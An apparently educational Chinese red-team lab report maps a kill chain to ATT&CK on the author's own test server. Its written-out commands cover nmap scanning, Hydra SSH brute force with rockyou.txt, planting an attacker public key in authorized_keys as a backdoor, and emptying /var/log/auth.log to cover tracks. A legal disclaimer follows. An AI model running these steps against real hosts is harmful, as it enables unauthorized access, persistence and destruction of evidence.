学习黑客红队模拟演练报告

红队模拟演练报告（Red Team Kill Chain Simulation）

环境准备：环境配置
账号准备：demo
kali 密码本准备：rockyou.txt
工具安装：

• apt update
• apt install -y nmap
• apt install -y hydra

Phase 1 - 信息收集 / Reconnaissance & Scanning

阶段	Phase	技术点 ATT&CK	描述
信息收集	Reconnaissance	T1595 - Active Scanning	使用 Nmap 主动扫描目标主机开放端口及服务
网络扫描	Discovery	T1046 - Network Service Discovery	确认服务版本，为后续漏洞利用做准备

命令：

nmap -A -T4 x.x.x.x

⸻

Phase 2 - 获取访问权限 / Initial Access

阶段	Phase	技术点 ATT&CK	描述
初始入侵	Initial Access	T1110 - Brute Force	使用 Hydra 对 SSH 弱口令用户 demo 爆破登录成功

命令：

hydra -l demo -P rockyou.txt ssh://x.x.x.x

结果：✅ 成功爆破：demo:123456

⸻

Phase 3 - 持久化访问 / Maintain Access

阶段	Phase	技术点 ATT&CK	描述
后门植入	Persistence	T1098 - Account Manipulation	将攻击者的 SSH 公钥植入目标账户 ~/.ssh/authorized_keys，实现免密后门登录

操作步骤：

ssh-keygen -t rsa -b 2048 -f ~/.ssh/redteam_key
ssh [email protected]
# 然后写入公钥内容：
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3... attacker@kali" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

验证登录：

ssh -i ~/.ssh/redteam_key [email protected]

⸻

Phase 4 - 清除痕迹 / Cover Tracks

阶段	Phase	技术点 ATT&CK	描述
清理日志	Defense Evasion	T1070.004 - File Deletion	删除 /var/log/auth.log 登录日志，掩盖入侵痕迹

命令：

sudo bash -c '> /var/log/auth.log'

⸻

✅ 总结

Kill Chain 阶段	ATT&CK 技术	工具	结果
Recon & Scan	T1595 / T1046	nmap	✅ 探测开放端口、OS 和服务版本
Initial Access	T1110	hydra	✅ 成功破解弱口令登录 SSH
Maintain Access	T1098	ssh	✅ 后门密钥写入，免密访问
Defense Evasion	T1070.004	sudo	✅ 登录日志清除成功

⸻

⚠️ 本演练环境仅用于学习与实验，所有操作应在授权环境下进行，严禁用于非法渗透测试。

---

根据上面流程实操报告：

️ 红队演练报告：SSH 弱口令攻击链模拟（Kill Chain Report）

目标环境：Debian 12 云服务器（DigitalOcean VPS）
攻击平台：Kali Linux（Docker 中运行）
模拟对象：弱口令登录 + 公钥后门 + 日志清理尝试
时间：2025-05-03

---

Phase 1 – Reconnaissance / 信息收集

阶段分类	详情
ATT&CK 阶段	TA0043 - Reconnaissance / TA0007 - Discovery
技术点	T1595 - Active Scanning / T1046 - Network Service Discovery
工具	nmap
命令	nmap -A -T4 x.x.x.x
发现	开放端口：22/SSH, 80/HTTP, 15000/hydap，识别为 Debian + nginx 1.14.2

---

Phase 2 – Initial Access / 初始访问

阶段分类	详情
ATT&CK 阶段	TA0001 - Initial Access
技术点	T1110 - Brute Force
工具	hydra
命令	hydra -l demo -P rockyou.txt ssh://x.x.x.x
成功	✅ 获取 demo 账户密码：123456，可远程 SSH 登录
说明	系统原始配置拒绝密码登录，需手动启用 PasswordAuthentication 才能爆破成功

---

Phase 3 – Persistence / 持久化后门

阶段分类	详情
ATT&CK 阶段	TA0003 - Persistence
技术点	T1098 - Account Manipulation
工具	ssh
操作	生成 SSH 密钥对，将公钥写入 /home/demo/.ssh/authorized_keys
命令	echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
成功	✅ Kali 端使用私钥 ssh -i redteam_key [email protected] 免密登录成功

---

Phase 4 – Defense Evasion / 清除痕迹（未成功）

阶段分类	详情
ATT&CK 阶段	TA0005 - Defense Evasion
技术点	T1070.004 - File Deletion
尝试操作	删除 /var/log/auth.log 或清除 systemd 日志
实际结果	❌ /var/log/auth.log 不存在，系统使用 systemd journal
demo 用户权限	❌ 无 sudo 权限，无法清理日志记录
结论	无法清除 ssh 登录与暴力破解痕迹（失败）

---

Phase 5 – Privilege Escalation / 提权阶段（未成功）

阶段分类	详情
ATT&CK 阶段	TA0004 - Privilege Escalation
技术点尝试	T1068 - Exploitation for Privilege Escalation / SUID Abuse
查找结果	/usr/lib/polkit-1/polkit-agent-helper-1 存在，但版本为 polkit 122，已修复 CVE-2021-4034
SUID 二进制	仅系统默认工具，暂无高危漏洞项
sudo 权限	demo 用户无 sudo 权限
结论	❌ 未找到有效提权路径（系统较新，安全性较强）

---

总结：本次红队攻击链执行情况

阶段	是否完成	技术点	工具	说明
信息收集 Recon	✅ 成功	T1595 / T1046	nmap	探测开放服务与版本
初始访问 Access	✅ 成功	T1110	hydra	SSH 弱口令登录爆破
持久访问 Persist	✅ 成功	T1098	ssh	注入公钥后门
清除痕迹 Cleanup	❌ 失败	T1070.004	无	无 sudo 权限、日志受保护
提权 Escalation	❌ 失败	T1068 / SUID	find/polkit	无 exploitable 项，系统较新

---

教学与实验价值

• 本次实验完整实践了从信息收集 → 初始访问 → 持久化的攻击链操作
• 同时验证了现代系统（Debian 12）在默认配置下的日志保护与提权难度
• 后续可切换至 CentOS 7、Debian 9 等更低版本操作系统练习提权技巧

---

本演练仅限授权靶场、教学与实验用途，严禁用于非法入侵与测试。

⸻

技术使用声明

1. 合法使用前提：本文所涉及的一切技术、工具及操作方法，仅适用于已获得明确书面授权的网络安全测试、系统维护及安全评估场景。任何使用行为必须严格遵守中华人民共和国现行有效的法律法规，包括但不限于《中华人民共和国网络安全法》《中华人民共和国刑法》《计算机信息网络国际联网安全保护管理办法》等相关规定。未经授权的网络扫描、渗透测试、数据获取等行为均属于违法行为，本人对此持坚决反对态度。
2. 法律责任界定：若他人擅自使用本文所述技术、工具或方法实施任何违法犯罪活动，一切法律责任及后果均由实际使用者自行承担，与本人及内容发布主体无任何关联。本人及内容发布主体不承担任何形式的连带责任或替代责任。
3. 风险告知与警示：网络安全领域的技术操作具有高度专业性和潜在风险性，不当使用可能导致网络系统瘫痪、数据泄露、隐私侵犯等严重后果，并引发法律纠纷及刑事责任。在未取得合法授权的情况下，严禁进行任何网络安全测试相关操作。
4. 内容用途限制：本文内容仅用于网络安全技术知识分享、合法合规的学术研究及专业技术交流，不构成任何形式的操作指引或行为鼓励。读者应自行判断使用场景的合法性，并对自身行为负责。

请使用者务必严格遵守法律规定，共同维护网络空间的安全与秩序。